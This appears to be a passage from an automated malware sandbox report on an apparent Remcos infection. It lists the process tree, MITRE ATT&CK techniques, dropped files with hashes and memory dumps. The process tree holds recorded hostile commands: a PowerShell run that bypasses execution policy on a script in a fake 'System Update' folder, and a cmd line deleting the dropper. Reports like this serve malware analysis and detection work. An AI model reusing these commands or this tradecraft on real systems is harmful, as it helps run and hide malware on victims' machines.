      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\qizeb.ps1"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4644
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:3156
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2484
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9.vbs"
      4⤵
      PID:2176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
e3d915e720e37f7ba8e8f8044fcf8c11

SHA1
873f64e4f2d20a6683f4d36f6995c7a046afcb06

SHA256
90e2837e3dad5760d7e32c29b15119fac67ad5c63e8dedf0af69026694bfbdf8

SHA512
b9d0c8c910e0736b4a0a98d6843abc07d186c79061d54e9ca838d46fd29e5ceb7f9cb0bdfbe10ad43e16b0e9556750133bc8e9a22dcb94c095298174543009a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\qizeb.ps1

Filesize
1.7MB

MD5
46153d1e4e7f4151898a8c84bbfa1037

SHA1
eb4dcd68cce1346869a5c2ec55430968ab683df5

SHA256
6104acedbcfcdaa76ad7e685a79d2581af61e8763f0b57c587df52c870a7a708

SHA512
b4ead3814d5f8d04eaef62b0b457878f08453917b3de06b1fa2a9e67bf6107240fb98fbee8a09aae86ab9b21f5a1e321f5915dfbe179bd95cdb2a0a34bd69914

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
1c0742d6a2f54198bc5546648b79797d

SHA1
da0d233399887eb27ebd902124b26e0cf4eca36d

SHA256
2f3bd0fae7da090bfa69193b58d66ee4c6600bf506327d4134feada5ff06da5a

SHA512
5ce52f1bd599e1f433c73167a88b675b7cb39e9d47f3b25abe18218864ad93df69705f6b2e9e8f7085e8a97a3fb1329e020213a0b99ec6e197e2ee9873acc796

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88f8c2c410d53e576ed352dfa2dfd991

SHA1
9fddaaa618bf7365d8bcd0136d24fa9b23ef25db

SHA256
21a2a4ff34c10d51bb130d94c8d78f4d9700203be423c4ea84281520b43352d9

SHA512
e7fafe4137a6aabee5b087eb8fa11e88d800caa0b9f2890dfe93098c247cea5470f6192f16f6cda22244cd46bdc8b98afca1a6fb4d0c607501c713b9eed53233

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
217d9191dfd67252cef23229676c9eda

SHA1
80d940b01c28e3933b9d68b3e567adc2bac1289f

SHA256
e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133

SHA512
86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ik133ai2.a1v.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/536-11-0x00007FF8A7AD0000-0x00007FF8A8591000-memory.dmp

Filesize
10.8MB

Download
memory/536-61-0x00007FF8A7AD3000-0x00007FF8A7AD5000-memory.dmp

Filesize
8KB

Download
memory/536-12-0x00007FF8A7AD0000-0x00007FF8A8591000-memory.dmp

Filesize
10.8MB

Download
memory/536-0-0x00007FF8A7AD3000-0x00007FF8A7AD5000-memory.dmp

Filesize
8KB

Download
memory/536-67-0x00007FF8A7AD0000-0x00007FF8A8591000-memory.dmp

Filesize
10.8MB

Download
memory/536-10-0x000001CD38510000-0x000001CD38532000-memory.dmp

Filesize
136KB

Download
memory/2484-84-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-98-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-130-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-86-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-87-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-90-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-91-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-92-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-93-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-94-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-97-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-82-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-129-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-105-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-106-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-113-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-114-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-121-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2484-122-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4644-81-0x0000022D9FD00000-0x0000022D9FD0A000-memory.dmp

Filesize
40KB

Download
memory/4852-22-0x00000218537E0000-0x00000218537EA000-memory.dmp

Filesize
40KB

Download